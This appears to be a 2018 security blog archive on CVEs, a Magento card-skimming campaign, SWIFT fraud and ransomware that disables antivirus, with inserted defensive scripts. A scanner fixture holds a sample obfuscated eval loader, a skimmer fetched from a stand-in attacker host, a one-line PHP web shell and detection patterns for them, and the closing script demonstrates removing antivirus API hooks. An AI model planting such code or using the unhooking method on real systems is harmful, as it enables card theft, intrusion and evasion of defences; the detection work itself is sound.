Category Archives: Under our observation

Magento-Based Websites Hacked: Steal Credit Card Data and Install Mining Malware

I have been keeping an eye on the Magento platform for some time. In January 2018, OnePlus confirmed a credit card breach that affected up to 40,000 customers, and a security researcher found that the OnePlus store was built on the Magento eCommerce platform. This week (April 2018) it was reported that over 1,000 Magento stores had been hacked. It is striking that only three months after the OnePlus incident another incident has happened. Security researchers observed three possible ways the compromise was carried out:

1. Malicious code inserted into Magento core files (to skim credit card data).

2. Cryptojacking scripts deployed by the attackers that mine Monero on the computers of store visitors.

3. Fake Adobe Flash Player update packages, which infect visitors with the AZORult infostealer.

Remark: the Trend Micro investigation report is available at the URL below for reference.

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/magento-based-websites-hacked-to-steal-credit-card-data-and-install-cryptocurrency-mining-malware

My observations differ somewhat from the above. For more details, please refer to the diagram above.
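The first vector above, code inserted into core files, is the one a store operator can check for directly. The script below is an added example (not from the original post, Magento or Trend Micro): it compares a hypothetical known-good hash manifest against the live file tree and scans PHP/JS files for a few injection signatures and for scripts loaded from hosts the store does not own. The file contents, paths and the attacker host are constructed for the example; a real baseline would be built from the clean vendor package of the same Magento release.

```python
import hashlib
import re

# Constructed "known-good" copies of a few files, standing in for a clean release.
CLEAN_FILES = {
    "app/Mage.php": "<?php\nfinal class Mage { public static function run() {} }\n",
    "app/code/core/Mage/Checkout/controllers/OnepageController.php":
        "<?php\nclass Mage_Checkout_OnepageController {\n"
        "    public function saveOrderAction() {}\n}\n",
    "js/varien/form.js": "var VarienForm = Class.create();\n",
}

# Constructed snapshot of the live store after a compromise of the kind described
# above: a core controller gains an obfuscated loader, a shipped JS file pulls a
# skimmer from a third-party host, and a web shell is dropped in a cache folder.
LIVE_FILES = dict(CLEAN_FILES)
LIVE_FILES["app/code/core/Mage/Checkout/controllers/OnepageController.php"] += (
    "eval(base64_decode('Li4u'));\n"          # 'Li4u' is just '...' here
)
LIVE_FILES["js/varien/form.js"] += (
    "document.write('<script src=\"https://cdn.attacker-example.net/s.js\">"
    "</script>');\n"
)
LIVE_FILES["media/.cache/x.php"] = "<?php system($_GET['c']);\n"

# A few signatures of injected PHP/JS; a real deployment needs a longer list.
INJECTION_PATTERNS = {
    "eval-base64": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "remote-script": re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]https?://"),
    "shell-exec": re.compile(
        r"\b(?:system|passthru|shell_exec|exec)\s*\(\s*\$_(?:GET|POST|REQUEST)"
    ),
}
HOST_RE = re.compile(r"https?://([^/'\"\s]+)")


def sha256_text(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def build_baseline(files):
    """Map path -> SHA-256 for a set of known-good files."""
    return {path: sha256_text(body) for path, body in files.items()}


def diff_against_baseline(baseline, live):
    """Classify live files as modified / added / missing relative to the baseline."""
    live_hashes = {path: sha256_text(body) for path, body in live.items()}
    return {
        "modified": sorted(p for p in baseline
                           if p in live_hashes and live_hashes[p] != baseline[p]),
        "added": sorted(p for p in live_hashes if p not in baseline),
        "missing": sorted(p for p in baseline if p not in live_hashes),
    }


def scan_file(body, allowed_hosts):
    """Return the injection signatures found plus any host outside the allowlist."""
    hits = [name for name, pat in INJECTION_PATTERNS.items() if pat.search(body)]
    hits += ["external-host:" + h for h in HOST_RE.findall(body)
             if h not in allowed_hosts]
    return hits


def audit(baseline, live, allowed_hosts):
    """Integrity diff plus content scan; only files with findings are listed."""
    report = diff_against_baseline(baseline, live)
    findings = {p: scan_file(b, allowed_hosts) for p, b in live.items()}
    report["suspicious"] = {p: h for p, h in findings.items() if h}
    return report


if __name__ == "__main__":
    result = audit(build_baseline(CLEAN_FILES), LIVE_FILES, {"www.store-example.com"})
    for key in ("modified", "added", "missing"):
        print(key, result[key])
    for path, hits in result["suspicious"].items():
        print("SUSPICIOUS", path, hits)
```

The hash diff catches modified and dropped files regardless of how the payload is obfuscated; the signature scan is only a second opinion for files that have no baseline (uploads, caches, custom themes). A modified core file is never legitimate on a Magento install that is updated through its package manager, so every entry in `modified` deserves a manual look.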

Oil refinery industry security alert! CVE-2018-4841

We hear frequently that threat actors engage in APT attacks against hostile countries, and a large proportion of attacks on critical public facilities are aimed at nuclear power facilities and power generators. As we know, nuclear power operators have built hardened procedures; to avoid unforeseen cyber incidents, Internet access is prohibited in those areas. However, SCADA technology is not limited to nuclear power facilities: oil refineries, natural gas plants and water supply facilities also rely on SCADA systems. Today's security alert should wake up the oil refinery, gas and water supply industries. SCADA hardware manufacturer Siemens has announced that one of its products is affected by a vulnerability (CVE-2018-4841). The manufacturer provides a workaround, but the workaround only suggests setting up a preventive control. To be honest, there may be more room for remediation. If you are concerned about this vulnerability, please refer to the vendor announcement below.

https://cert-portal.siemens.com/productcert/pdf/ssa-110922.pdf

IOS-XE vulnerabilities (CVE-2018-0196) + (CVE-2018-0171 & CVE-2018-0151)

A medium-severity vulnerability in an IT product is perhaps no shock. However, when a medium vulnerability coexists with known critical vulnerabilities, the combination makes it hard to foresee the level of damage. Cisco IOS XE is, by fundamental design, integrated with open systems. The severity of CVE-2018-0196 is medium. Customers can disable the HTTP server feature to avoid the vulnerability, but the default state of the HTTP Server feature is version-dependent, so its absence from the configuration does not prove it is off. This is a significant signal to Cisco customers that corrective control alone is not enough; a more efficient way is to enhance preventive and detective controls, for example by implementing managed security services. The critical vulnerabilities were published last week, and CVE-2018-0196 has now been confirmed, so the set is summarized below:

CVE-2018-0196 

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-wfw

CVE-2018-0151

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos

CVE-2018-0171

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
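As a small detective control for the three advisories above, here is an added example (not from the original post or from Cisco) that audits a saved `show running-config` for the workarounds: whether the HTTP server is explicitly disabled for CVE-2018-0196, whether Smart Install is disabled (`no vstack`) for CVE-2018-0171, and whether an ACL drops UDP port 18999, the port named in the Cisco advisory for CVE-2018-0151. The configuration excerpt, hostname, addresses and the ACL name `INFRA-ACL` are constructed for the example; upgrading to a fixed release remains the real fix.

```python
import re

# Constructed excerpt of `show running-config` from a hypothetical IOS XE router.
SAMPLE_RUNNING_CONFIG = """\
version 16.3
hostname edge-rtr-1
!
ip http server
ip http secure-server
!
interface GigabitEthernet0/0/0
 ip address 192.0.2.1 255.255.255.0
!
line vty 0 4
 transport input ssh
!
end
"""


def _line_present(cfg, line):
    """True if `line` appears as a whole configuration line."""
    return re.search(r"^" + re.escape(line) + r"\s*$", cfg, re.MULTILINE) is not None


def audit_ios_config(cfg):
    """Return a dict of finding -> state for the three advisories."""
    findings = {}
    for key, cmd in (("http-server", "ip http server"),
                     ("http-secure-server", "ip http secure-server")):
        if _line_present(cfg, "no " + cmd):
            findings[key] = "disabled"
        elif _line_present(cfg, cmd):
            findings[key] = "enabled"
        else:
            # Absence is not proof: the default is version-dependent, so the
            # state has to be confirmed on the device itself.
            findings[key] = "default (version-dependent; verify with show ip http server status)"
    if _line_present(cfg, "no vstack"):
        findings["smart-install"] = "disabled"
    else:
        findings["smart-install"] = "not explicitly disabled (verify with show vstack config)"
    # CVE-2018-0151 is triggered by traffic to UDP port 18999 (per the Cisco
    # advisory); look for an access-list entry that drops it.
    if re.search(r"^\s*deny\s+udp\s+.*\beq\s+18999\b", cfg, re.MULTILINE):
        findings["qos-udp-18999"] = "filtered by ACL"
    else:
        findings["qos-udp-18999"] = "no ACL entry for UDP 18999 found"
    return findings


def remediation_commands(findings):
    """Workaround commands implied by the findings. The ACL name, its trailing
    permit and the interface it is applied to are hypothetical; adapt them to
    your own infrastructure addressing before use."""
    cmds = []
    if findings["http-server"] != "disabled":
        cmds.append("no ip http server")
    if findings["http-secure-server"] != "disabled":
        cmds.append("no ip http secure-server")
    if findings["smart-install"] != "disabled":
        cmds.append("no vstack")
    if findings["qos-udp-18999"] != "filtered by ACL":
        cmds += ["ip access-list extended INFRA-ACL",
                 " deny udp any any eq 18999",
                 " permit ip any any",
                 "interface GigabitEthernet0/0/0",
                 " ip access-group INFRA-ACL in"]
    return cmds


if __name__ == "__main__":
    findings = audit_ios_config(SAMPLE_RUNNING_CONFIG)
    for key, state in findings.items():
        print(f"{key:20} {state}")
    print("\n".join(remediation_commands(findings)))
```

Run it against configs pulled by your backup tool rather than by hand: the point is to find the devices where the workaround was never applied, and to flag the "default" cases that still need `show ip http server status` on the box.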

Bank Negara Malaysia (Bank) detected and foiled a cybersecurity incident involving attempted unauthorized fund transfers using falsified SWIFT messages.

The Easter holiday made me lazy. I saw a cyber incident alert posted by my friend Enoch yesterday, but I ignored it until this evening. The details of this incident are that the crooks used falsified SWIFT messages to try to achieve their goal. The news said they were not successful. As far as I remember, in February this year City Union Bank in India was the victim of a cyber hack through the SWIFT system. My speculation is that it is a flaw in MT 202, a fundamental design limitation of the original MT 202 message. Perhaps MT 202 COV provides the compensating control, but MT 202 COV must not be used for any other interbank transfer, and MT 202 is still valid and not end of life yet. Some hints on the technical concerns are shown in the attached picture; see whether this is the root cause of this incident.

MT 202 design weaknesses that lure financial crime

i. Suspicious activity monitoring of the underlying originator and beneficiary of the payment cannot be performed, because a plain MT 202 carries only the ordering and beneficiary institutions, not the customers behind them.

ii. The originating bank could be in a jurisdiction with different sanctions watch lists, and the technical capabilities of each bank's sanctions screening program could vary.
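To make points i and ii concrete, here is an added example (not from the original post, BNM or SWIFT) that parses the text-block fields of a constructed MT 202 and the same transfer as MT 202 COV, then runs a name-list check on the underlying customer parties. The plain MT 202 yields nothing to screen; the COV variant carries the originator (field 50a) and beneficiary customer (field 59a) in its sequence B, and the outcome depends on which watch list the screening bank applies. BICs, references, names and the watch list are invented, and only the body fields are shown, not the full SWIFT block envelope.

```python
import re

# Constructed messages: a plain MT 202 and the same transfer as MT 202 COV.
MT202 = """\
:20:REF20180328001
:21:RELATED0001
:32A:180328USD1000000,
:52A:ORDRMYKLXXX
:58A:BENEUS33XXX
"""

# Sequence B of the COV carries the underlying customers (fields 50a and 59a).
MT202_COV = MT202 + """\
:50K:/12345678
ACME TRADING SDN BHD
KUALA LUMPUR
:59:/87654321
NORTHWIND IMPORTS LLC
NEW YORK
:70:INVOICE 4711
"""

TAG_RE = re.compile(r"^:(\d{2}[A-Z]?):(.*)$")


def parse_mt(text):
    """Parse ':tag:value' lines (with continuation lines) into {tag: value}."""
    fields, tag = {}, None
    for line in text.splitlines():
        m = TAG_RE.match(line)
        if m:
            tag, value = m.group(1), m.group(2)
            fields[tag] = value
        elif tag is not None:
            fields[tag] += "\n" + line
    return fields


def party_name(fields, tag_prefix):
    """First non-account line of a 50a/59a party field, or None if absent."""
    for tag, value in fields.items():
        if tag.startswith(tag_prefix):
            for line in value.splitlines():
                if not line.startswith("/"):
                    return line.strip()
    return None


def screen(fields, watchlist):
    """Name check on the underlying customer parties only.
    Returns (names_screened, hits); for a plain MT 202 both lists are empty,
    which is exactly the monitoring gap described in point i."""
    names = [n for n in (party_name(fields, "50"), party_name(fields, "59")) if n]
    hits = [n for n in names if n.upper() in watchlist]
    return names, hits


if __name__ == "__main__":
    watchlist = {"NORTHWIND IMPORTS LLC"}   # constructed list for the example
    for label, msg in (("MT202", MT202), ("MT202 COV", MT202_COV)):
        names, hits = screen(parse_mt(msg), watchlist)
        print(f"{label:10} screened={names} hits={hits}")
```

Note that the screening result for the COV message changes with the watch list passed in: two banks in the chain applying different lists (point ii) will reach different conclusions on the same message, and the plain MT 202 gives neither of them anything to look at.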

The press release (Cybersecurity Incident Involving the Use of Falsified SWIFT Messages) is at the URL below:

http://www.bnm.gov.my/index.php?ch=en_press&pg=en_press&ac=4651

Reference:

City Union Bank in India victim of cyber hack through SWIFT system – Reuters headline news (19 Feb 2018)


Mar 2018 – Apple Releases Multiple Security Updates

I spent a lot of time this week studying the security updates from Apple. A CoreFoundation vulnerability caught my attention. As we know, Objective-C is a general-purpose, object-oriented programming language used by Apple for the OS X and iOS operating systems. Apple has long urged developers to follow good practices that prevent memory-related problems. I am concerned about the race condition vulnerability found this time. There are two main kinds of problem that result from incorrect memory management: freeing or overwriting data that is still in use, which corrupts memory and can be exploitable, and not freeing data that is no longer in use, which causes memory leaks. A race between a thread that releases an object and another thread that still uses it is one way the first kind of bug, and thus an exploitable vulnerability, arises.

Since plenty of vulnerabilities are addressed this time, please refer to the official URLs below for details.

About the security content of iOS 11.3

https://support.apple.com/en-us/HT208693

About the security content of Xcode 9.3

https://support.apple.com/en-us/HT208699

CVE-2018-1327: DoS attack is possible when using XStream handler with the Struts REST plugin


Vulnerabilities, when will they stop? This is our holiday! The Apache Software Foundation has released a security update to address a vulnerability in Struts 2: a DoS attack is possible when using the XStream handler with the Struts REST plugin. As far as I know, Cisco integrates Struts 2 into its product designs, and there has been no status update from Cisco regarding this vulnerability yet. So, stay tuned!

You can find the official technical details below:

https://cwiki.apache.org/confluence/display/WW/S2-056

This vulnerability could be called the Easter holiday vulnerability.

Drupal core – Highly critical – Remote Code Execution (Mar 2018)

A Drupal core installation can serve as a simple web site, a single- or multi-user blog, an Internet forum, or a community web site providing for user-generated content. Drupal's security risk calculator, which is based on the NIST Common Misuse Scoring System (NISTIR 7864), rates this issue (SA-CORE-2018-002, CVE-2018-7600) as highly critical. Two critical factors tell us the following:

  • All data can be modified or deleted
  • All non-public data is accessible

It is indeed a nightmare. Drupal users must patch immediately; otherwise a new round of data leakage incidents will happen soon.
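Patching a fleet starts with knowing which installs are still exposed. The following is an added example (not from the original post or from the Drupal project) that reads the version constant Drupal keeps in its own source tree (`define('VERSION', ...)` in `includes/bootstrap.inc` on Drupal 7, `const VERSION` in `core/lib/Drupal.php` on Drupal 8) and compares it with the releases the advisory lists as fixed: 7.58, 8.5.1, 8.4.6 and 8.3.9. The two file excerpts are constructed; 8.x branches older than 8.3 are treated as unpatched because no fix was issued for them.

```python
import re

# Where Drupal records its own version (Drupal 7 and Drupal 8 source layouts).
VERSION_PATTERNS = [
    re.compile(r"define\('VERSION',\s*'([\d.]+)'\);"),   # D7: includes/bootstrap.inc
    re.compile(r"const VERSION = '([\d.]+)';"),           # D8: core/lib/Drupal.php
]

# Releases that carry the SA-CORE-2018-002 fix, keyed by branch.
FIXED = {"7": (7, 58), "8.3": (8, 3, 9), "8.4": (8, 4, 6), "8.5": (8, 5, 1)}

# Constructed file excerpts standing in for two real installs.
D7_BOOTSTRAP_INC = "<?php\n/**\n * The current system version.\n */\ndefine('VERSION', '7.57');\n"
D8_DRUPAL_PHP = "<?php\nclass Drupal {\n  const VERSION = '8.5.1';\n}\n"


def extract_version(source):
    """Pull the version string out of either file layout, or None."""
    for pat in VERSION_PATTERNS:
        m = pat.search(source)
        if m:
            return m.group(1)
    return None


def parse_version(version):
    return tuple(int(part) for part in version.split("."))


def is_patched(version):
    """True if the version is at or above the fixed release of its branch."""
    parts = parse_version(version)
    if parts[0] == 7:
        return parts >= FIXED["7"]
    if parts[0] == 8:
        branch = f"8.{parts[1]}"
        if branch in FIXED:
            return parts >= FIXED[branch]
        return parts[1] > 5          # 8.6 and later shipped after the fix
    return False                     # unknown major: treat as unpatched


def check_install(source):
    """Return (version, patched) for one version-bearing source file."""
    version = extract_version(source)
    if version is None:
        return None, False
    return version, is_patched(version)


if __name__ == "__main__":
    for label, src in (("drupal7", D7_BOOTSTRAP_INC), ("drupal8", D8_DRUPAL_PHP)):
        version, ok = check_install(src)
        print(f"{label}: {version} -> {'patched' if ok else 'VULNERABLE'}")
```

A version string is only a first filter: an install that was already exploited stays compromised after the upgrade, so any site found unpatched here should also be checked for unexpected files and accounts before being trusted again.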

Official announcement: Drupal core – Highly critical – Remote Code Execution

https://www.drupal.org/sa-core-2018-002

CVE-2018-5148: Mozilla Foundation Security Advisory 2018-10 Use-after-free

Hi folks, Homeland Security urges computer users to stay alert to a web browser (Firefox) vulnerability. The design flaw could let an attacker crash the browser, and the advisory rates that crash as potentially exploitable, so it is more than a denial-of-service condition. I reviewed the vulnerability details, which state the following: a use-after-free vulnerability can occur in the compositor during certain graphics operations when a raw pointer is used instead of a reference-counted one. This results in a potentially exploitable crash. But I have a different idea of this flaw. In short, please refer to the diagram below.

To be or not to be? Either way, it is better to apply the security update now. For more details, please refer to the URL below.

https://www.mozilla.org/en-US/security/advisories/mfsa2018-10/

CVE-2017-18225 – Does it affect the Cisco Jabber iPhone and Android client products?

IP telephony integration into the IT infrastructure has been a major trend over the last decade. Following security best practice, the IP telephony system should be isolated and kept far from the data network. However, end-user functional requirements cause Unified Communications Manager to be integrated with Active Directory services. Useful functions become available after Active Directory integration; for instance, individual communication histories can be tracked, which enhances the monitoring and control process (SOX 403 monitoring and control). But no design is free of trade-offs, so vulnerabilities are hard to avoid. For example, Cisco IP telephony worked with Microsoft TSAPI over the last decade, but more recently Android and iPhone have grown rapidly, and IP telephony vendors end up making use of open source components, sometimes unintentionally. An XMPP client is any software or application that lets you connect to an XMPP server for instant messaging with other people over the Internet. Cisco officially announced a vulnerability in the Jabber client in November 2017 (CVE-2017-12361).

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20171129-jabber2

Another Jabber-related design flaw was identified this month (CVE-2017-18225). The issue is that the vulnerability might allow local users to gain privileges by leveraging access to that account and then waiting for root to execute one of the affected programs. So far we have not received any announcement from Cisco about CVE-2017-18225, but we will keep our eyes open to see whether it affects the Cisco Jabber iPhone and Android client products.

Details of CVE-2017-18225 are shown below:

https://security.gentoo.org/glsa/201803-07


Threat actors intend to stop your antivirus program – 2018

I just heard that there is a new attack method used by ransomware: the malware tries to stop and disable the workstation's antivirus process. With no antivirus protection, the threat actor is free to carry out its task. Perhaps defense vendors focus on ring 0 (kernel) attacks, and new-generation AV software implements behavioral detection analysis. So is there any room left for the threat actor? Yes, ring 3 (user mode) still gives the threat actor room: the user-mode API hooks an AV places in a process can be removed from inside that process, which evades behavioral detection that relies on them.

For instance:

  1. List all DLL libraries loaded in the current process.
  2. Find the entry-point address of every imported API function in each DLL.
  3. Remove the injected hook (the JMP instruction) by replacing it with the API's original bytes.

For a high-level understanding, please refer to the diagram above.
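The three steps above reduce to one comparison: the first bytes of each exported function in memory versus the same bytes in the on-disk copy of the DLL. The following added example (not from the original post or from any AV vendor) implements that comparison and the restore step on constructed byte strings instead of live process memory: a fake image with two syscall-stub-like prologues, a hypothetical export table, and a `JMP rel32` hook installed to a hypothetical trampoline address. The same check is the one a defender wants, run the other way round: an AV can use it to verify that its own hooks are still in place. A real implementation walks the process module list and each DLL's export directory, and must account for relocations before trusting the disk copy; none of that is shown here.

```python
import struct

IMAGE_BASE = 0x7FF800000000               # hypothetical load address of the DLL
HOOK_TRAMPOLINE = IMAGE_BASE + 0x200000   # hypothetical address the hook jumps to

# Constructed export table: function name -> RVA inside the fake image.
EXPORTS = {"NtCreateFile": 0x10, "NtWriteFile": 0x40}


def build_disk_image():
    """Constructed 'on-disk' image: two x64 stub prologues
    (mov r10, rcx ; mov eax, imm32) in a sea of INT3 padding."""
    image = bytearray(b"\xCC" * 0x80)
    image[0x10:0x18] = b"\x4C\x8B\xD1\xB8\x55\x00\x00\x00"
    image[0x40:0x48] = b"\x4C\x8B\xD1\xB8\x08\x00\x00\x00"
    return bytes(image)


def install_hook(image, rva, target, base=IMAGE_BASE):
    """What the hooking side does: overwrite the first 5 bytes at rva with
    JMP rel32 to target (rel32 is relative to the end of the JMP)."""
    patched = bytearray(image)
    rel = target - (base + rva + 5)
    patched[rva:rva + 5] = b"\xE9" + struct.pack("<i", rel)
    return bytes(patched)


def jmp_target(code, at, base=IMAGE_BASE):
    """Absolute target if code[at:] starts with E9 rel32, else None."""
    if len(code) < at + 5 or code[at] != 0xE9:
        return None
    rel = struct.unpack_from("<i", code, at + 1)[0]
    return base + at + 5 + rel


def find_hooks(memory_image, disk_image, exports, base=IMAGE_BASE):
    """Step 2: for every export, compare the entry bytes in memory with the
    disk copy; a mismatch is reported with the JMP target (if it is one)."""
    hooks = {}
    for name, rva in exports.items():
        if memory_image[rva:rva + 5] != disk_image[rva:rva + 5]:
            hooks[name] = {"target": jmp_target(memory_image, rva, base),
                           "original": disk_image[rva:rva + 5]}
    return hooks


def unhook(memory_image, hooks, exports):
    """Step 3: put the original bytes back over every detected hook."""
    restored = bytearray(memory_image)
    for name, info in hooks.items():
        rva = exports[name]
        restored[rva:rva + 5] = info["original"]
    return bytes(restored)


if __name__ == "__main__":
    disk = build_disk_image()
    memory = install_hook(disk, EXPORTS["NtCreateFile"], HOOK_TRAMPOLINE)
    hooks = find_hooks(memory, disk, EXPORTS)
    for name, info in hooks.items():
        print(f"{name}: hooked, jumps to {info['target']:#x}")
    print("restored matches disk:", unhook(memory, hooks, EXPORTS) == disk)
```

Because the comparison is symmetric, the defensive use is a periodic self-check: if `find_hooks` against the AV's own expected hooked bytes suddenly reports a mismatch, something in the process has rewritten the prologue, and that is the signal to escalate rather than to silently re-hook.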